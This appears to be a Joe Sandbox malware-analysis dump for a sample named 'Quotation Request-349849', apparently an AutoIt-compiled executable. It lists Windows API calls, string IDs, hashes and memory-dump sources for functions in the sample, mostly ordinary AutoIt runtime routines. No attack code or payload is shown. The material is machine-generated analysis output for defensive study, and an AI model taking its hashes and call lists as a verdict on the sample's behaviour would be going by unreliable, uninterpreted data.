                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                      • String ID: AutoIt v3 GUI
                                                      • API String ID: 1458621304-248962490
                                                      • Opcode ID: f4eae614ea925c8fb5de9ba99b1e58372e4c2124a0d490e32abd9d0d401aa79e
                                                      • Instruction ID: ec648d0fbe114a191c18b6c34333eed8666a3cab9ecd5abeed89c9697b31ec78
                                                      • Opcode Fuzzy Hash: f4eae614ea925c8fb5de9ba99b1e58372e4c2124a0d490e32abd9d0d401aa79e
                                                      • Instruction Fuzzy Hash: 45B1707160060AEFDB15DFA8DC45BAE7BB4FB58311F10422AFA15E72D1DB78A842CB50
                                                      APIs
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 0082A47A
                                                      • __swprintf.LIBCMT ref: 0082A51B
                                                      • _wcscmp.LIBCMT ref: 0082A52E
                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0082A583
                                                      • _wcscmp.LIBCMT ref: 0082A5BF
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 0082A5F6
                                                      • GetDlgCtrlID.USER32(?), ref: 0082A648
                                                      • GetWindowRect.USER32(?,?), ref: 0082A67E
                                                      • GetParent.USER32(?), ref: 0082A69C
                                                      • ScreenToClient.USER32(00000000), ref: 0082A6A3
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 0082A71D
                                                      • _wcscmp.LIBCMT ref: 0082A731
                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0082A757
                                                      • _wcscmp.LIBCMT ref: 0082A76B
                                                        • Part of subcall function 007F362C: _iswctype.LIBCMT ref: 007F3634
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                      • String ID: %s%u
                                                      • API String ID: 3744389584-679674701
                                                      • Opcode ID: 59482460bad1c0ad12cf958296b5852d4fda05a6448f8e36c88debffa30cde09
                                                      • Instruction ID: 8313a1f324d348f1083478d7ab1d9d9f7fb307295873156adb17affc7ef39872
                                                      • Opcode Fuzzy Hash: 59482460bad1c0ad12cf958296b5852d4fda05a6448f8e36c88debffa30cde09
                                                      • Instruction Fuzzy Hash: 28A1F271204326EFDB18DF60D888FAAB7E8FF54304F008529F999D2191DB34E995CB92
                                                      APIs
                                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 0082AF18
                                                      • _wcscmp.LIBCMT ref: 0082AF29
                                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 0082AF51
                                                      • CharUpperBuffW.USER32(?,00000000), ref: 0082AF6E
                                                      • _wcscmp.LIBCMT ref: 0082AF8C
                                                      • _wcsstr.LIBCMT ref: 0082AF9D
                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0082AFD5
                                                      • _wcscmp.LIBCMT ref: 0082AFE5
                                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 0082B00C
                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0082B055
                                                      • _wcscmp.LIBCMT ref: 0082B065
                                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 0082B08D
                                                      • GetWindowRect.USER32(00000004,?), ref: 0082B0F6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                      • String ID: @$ThumbnailClass
                                                      • API String ID: 1788623398-1539354611
                                                      • Opcode ID: f5940f6b239d0772ec6245bba06da60fb75da1baea94322a5189e680e70a3976
                                                      • Instruction ID: 28ed31462df577b58cda2de59afee1d9fc467fc47a8af3a1155e1dc771e66d57
                                                      • Opcode Fuzzy Hash: f5940f6b239d0772ec6245bba06da60fb75da1baea94322a5189e680e70a3976
                                                      • Instruction Fuzzy Hash: 5381CE711083199BDB05DF14D985FAA7BE8FF84314F04846AFD85CA192DB38DD89CBA2
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: __wcsnicmp
                                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                      • API String ID: 1038674560-1810252412
                                                      • Opcode ID: 526842adf771ed92feb9ac66a01c0aacad4b4ef1823912d868712350f41cce9f
                                                      • Instruction ID: 96c58bffa944697c29e48aedf590ad749f8e2990aac4ccbbf18dd1527474b96d
                                                      • Opcode Fuzzy Hash: 526842adf771ed92feb9ac66a01c0aacad4b4ef1823912d868712350f41cce9f
                                                      • Instruction Fuzzy Hash: 5E319070548229EBDA1CFA64EE47EBE7774FF10750F70042AB821F12D1EA69AF44C652
                                                      APIs
                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 00845013
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0084501E
                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00845029
                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 00845034
                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 0084503F
                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 0084504A
                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 00845055
                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 00845060
                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 0084506B
                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 00845076
                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00845081
                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 0084508C
                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00845097
                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 008450A2
                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 008450AD
                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 008450B8
                                                      • GetCursorInfo.USER32(?), ref: 008450C8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Cursor$Load$Info
                                                      • String ID:
                                                      • API String ID: 2577412497-0
                                                      • Opcode ID: e1c1848be457c8f9b166aa2b5b7ec21fa045713f8e9c3735a091442428ac4c37
                                                      • Instruction ID: 997fe6e1eb9c921a81d3d544e311fc3293e142cc926b46427233681baff9b9c5
                                                      • Opcode Fuzzy Hash: e1c1848be457c8f9b166aa2b5b7ec21fa045713f8e9c3735a091442428ac4c37
                                                      • Instruction Fuzzy Hash: D831E1B1D4871DABDF109FB68C8996EBFF8FB08750F50452AA50DE7281DA78A5008E91
                                                      APIs
                                                      • _memset.LIBCMT ref: 0085A259
                                                      • DestroyWindow.USER32(?,?), ref: 0085A2D3
                                                        • Part of subcall function 007D7BCC: _memmove.LIBCMT ref: 007D7C06
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0085A34D
                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0085A36F
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0085A382
                                                      • DestroyWindow.USER32(00000000), ref: 0085A3A4
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,007D0000,00000000), ref: 0085A3DB
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0085A3F4
                                                      • GetDesktopWindow.USER32 ref: 0085A40D
                                                      • GetWindowRect.USER32(00000000), ref: 0085A414
                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0085A42C
                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0085A444
                                                        • Part of subcall function 007D25DB: GetWindowLongW.USER32(?,000000EB), ref: 007D25EC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                      • String ID: 0$tooltips_class32
                                                      • API String ID: 1297703922-3619404913
                                                      • Opcode ID: edb2cedfc79be1dcb20b7e7d9350bb84de48d06624f1aea9cd098876668641db
                                                      • Instruction ID: c64be27598351ec0b6f97be045be8f5a8fa8bdb690cc66e43f5ad2b608a249fd
                                                      • Opcode Fuzzy Hash: edb2cedfc79be1dcb20b7e7d9350bb84de48d06624f1aea9cd098876668641db
                                                      • Instruction Fuzzy Hash: E471DC70140204AFD729DF28CC88FA67BE5FB88705F08062DF985D72A1D775E906CB52
                                                      APIs
                                                        • Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623
                                                      • DragQueryPoint.SHELL32(?,?), ref: 0085C627
                                                        • Part of subcall function 0085AB37: ClientToScreen.USER32(?,?), ref: 0085AB60
                                                        • Part of subcall function 0085AB37: GetWindowRect.USER32(?,?), ref: 0085ABD6
                                                        • Part of subcall function 0085AB37: PtInRect.USER32(?,?,0085C014), ref: 0085ABE6
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0085C690
                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0085C69B
                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0085C6BE
                                                      • _wcscat.LIBCMT ref: 0085C6EE
                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0085C705
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0085C71E
                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0085C735
                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0085C757
                                                      • DragFinish.SHELL32(?), ref: 0085C75E
                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0085C851
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                      • API String ID: 169749273-3440237614
                                                      • Opcode ID: 70f5f4497745a76170c61cb5f453d329c9939ea3eff932f37906bedead146c54
                                                      • Instruction ID: 5059c6125e5ffe664d2572dd06f31e1bff8898972f010ac07b95803cff4f243b
                                                      • Opcode Fuzzy Hash: 70f5f4497745a76170c61cb5f453d329c9939ea3eff932f37906bedead146c54
                                                      • Instruction Fuzzy Hash: CB615071108300AFC701EF54CC85DABBBF9FF99751F00092EF695962A1DB74A549CB52
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 00854424
                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0085446F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: BuffCharMessageSendUpper
                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                      • API String ID: 3974292440-4258414348
                                                      • Opcode ID: 6f8ce909c4f039848a59da409c4f084a91511afac66766f2e4fff387ce28c543
                                                      • Instruction ID: 78b2aee523b5f55cec890cee52b0c204873fdf7fd184015f8a3c5a7deec9ac79
                                                      • Opcode Fuzzy Hash: 6f8ce909c4f039848a59da409c4f084a91511afac66766f2e4fff387ce28c543
                                                      • Instruction Fuzzy Hash: 1E9189302007018BCB04EF20C455A6EB7E1FF95758F048869FD969B3A2DB34EC89CB82
                                                      APIs
                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0085B8B4
                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,008591C2), ref: 0085B910
                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0085B949
                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0085B98C
                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0085B9C3
                                                      • FreeLibrary.KERNEL32(?), ref: 0085B9CF
                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0085B9DF
                                                      • DestroyIcon.USER32(?,?,?,?,?,008591C2), ref: 0085B9EE
                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0085BA0B
                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0085BA17
                                                        • Part of subcall function 007F2EFD: __wcsicmp_l.LIBCMT ref: 007F2F86
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                      • String ID: .dll$.exe$.icl
                                                      • API String ID: 1212759294-1154884017
                                                      • Opcode ID: da93a75769ae833a071e5853b9891ba53c1440a47331bc4792beec92520b8f95
                                                      • Instruction ID: d450bab3d9d7ba42ec894369385b4a19e2410c94a66d8ceeea4fd4da3363e977
                                                      • Opcode Fuzzy Hash: da93a75769ae833a071e5853b9891ba53c1440a47331bc4792beec92520b8f95
                                                      • Instruction Fuzzy Hash: 5061EF71900219FAEB14DF64CC4AFBE7BA8FB18722F104116FE15D61C1EB789994DBA0
                                                      APIs
                                                      • GetLocalTime.KERNEL32(?), ref: 0083DCDC
                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 0083DCEC
                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0083DCF8
                                                      • __wsplitpath.LIBCMT ref: 0083DD56
                                                      • _wcscat.LIBCMT ref: 0083DD6E
                                                      • _wcscat.LIBCMT ref: 0083DD80
                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0083DD95
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0083DDA9
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0083DDDB
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0083DDFC
                                                      • _wcscpy.LIBCMT ref: 0083DE08
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0083DE47
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                      • String ID: *.*
                                                      • API String ID: 3566783562-438819550
                                                      • Opcode ID: ba6c40120373025bbc47490353680291760ad0801f7a63589a18082732ca9ad0
                                                      • Instruction ID: add47950bbf5ca028bfe803e354901080961dc252d454a198361ffb1c0c6b466
                                                      • Opcode Fuzzy Hash: ba6c40120373025bbc47490353680291760ad0801f7a63589a18082732ca9ad0
                                                      • Instruction Fuzzy Hash: 8E6147B25043459FCB10EF64D8449AEB3E8FF89314F04492EEA89D7351DB35EA45CB92
                                                      APIs
                                                      • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00839C7F
                                                        • Part of subcall function 007D7DE1: _memmove.LIBCMT ref: 007D7E22
                                                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00839CA0
                                                      • __swprintf.LIBCMT ref: 00839CF9
                                                      • __swprintf.LIBCMT ref: 00839D12
                                                      • _wprintf.LIBCMT ref: 00839DB9
                                                      • _wprintf.LIBCMT ref: 00839DD7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: LoadString__swprintf_wprintf$_memmove
                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                      • API String ID: 311963372-3080491070
                                                      • Opcode ID: 56eb185cb0712f4ffebf6b24a1f136d10f885586e0c9c22fb6fe9e59448395cc
                                                      • Instruction ID: 61c3ce687b269889276efc3f56f67157c5e9ab20a33e876b432a4406389936fe
                                                      • Opcode Fuzzy Hash: 56eb185cb0712f4ffebf6b24a1f136d10f885586e0c9c22fb6fe9e59448395cc
                                                      • Instruction Fuzzy Hash: 27515C31900509EACB19FBE4DD4AEEEB779FF14300F500066F505B22A2EB792E58CB61
                                                      APIs
                                                        • Part of subcall function 007D9837: __itow.LIBCMT ref: 007D9862
                                                        • Part of subcall function 007D9837: __swprintf.LIBCMT ref: 007D98AC
                                                      • CharLowerBuffW.USER32(?,?), ref: 0083A3CB
                                                      • GetDriveTypeW.KERNEL32 ref: 0083A418
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0083A460
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0083A497
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0083A4C5
                                                        • Part of subcall function 007D7BCC: _memmove.LIBCMT ref: 007D7C06
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                      • API String ID: 2698844021-4113822522
                                                      • Opcode ID: 6094af4163f91e03b5231590de775a91e1120ac9850fbe4438c02352562228ae
                                                      • Instruction ID: 638b55c5f5aac107022b91110d6f95d6f928c49ca672115181830b3f28d40faf
                                                      • Opcode Fuzzy Hash: 6094af4163f91e03b5231590de775a91e1120ac9850fbe4438c02352562228ae
                                                      • Instruction Fuzzy Hash: 35510771104205DFC704EF24C99586AB7F4FF94718F50886EF89A973A2DB35AD09CB92
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0080E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0082F8DF
                                                      • LoadStringW.USER32(00000000,?,0080E029,00000001), ref: 0082F8E8
                                                        • Part of subcall function 007D7DE1: _memmove.LIBCMT ref: 007D7E22
                                                      • GetModuleHandleW.KERNEL32(00000000,00895310,?,00000FFF,?,?,0080E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0082F90A
                                                      • LoadStringW.USER32(00000000,?,0080E029,00000001), ref: 0082F90D
                                                      • __swprintf.LIBCMT ref: 0082F95D
                                                      • __swprintf.LIBCMT ref: 0082F96E
                                                      • _wprintf.LIBCMT ref: 0082FA17
                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0082FA2E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                      • API String ID: 984253442-2268648507
                                                      • Opcode ID: 748b33614983908ba0e31489286bc31629a300692464b5d44a192ecdab2cc2dd
                                                      • Instruction ID: ae64d83e763dfb849720813f8aee850b154287850debac6713b4f0cebfbbc6d2
                                                      • Opcode Fuzzy Hash: 748b33614983908ba0e31489286bc31629a300692464b5d44a192ecdab2cc2dd
                                                      • Instruction Fuzzy Hash: B441207290411DEACF08FBE4DD5ADEE7778EF14300F500466B605B6292EA396F49CB61
                                                      APIs
                                                      • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00859207,?,?), ref: 0085BA56
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00859207,?,?,00000000,?), ref: 0085BA6D
                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00859207,?,?,00000000,?), ref: 0085BA78
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00859207,?,?,00000000,?), ref: 0085BA85
                                                      • GlobalLock.KERNEL32(00000000), ref: 0085BA8E
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00859207,?,?,00000000,?), ref: 0085BA9D
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0085BAA6
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00859207,?,?,00000000,?), ref: 0085BAAD
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00859207,?,?,00000000,?), ref: 0085BABE
                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00862CAC,?), ref: 0085BAD7
                                                      • GlobalFree.KERNEL32(00000000), ref: 0085BAE7
                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 0085BB0B
                                                      • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0085BB36
                                                      • DeleteObject.GDI32(00000000), ref: 0085BB5E
                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0085BB74
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
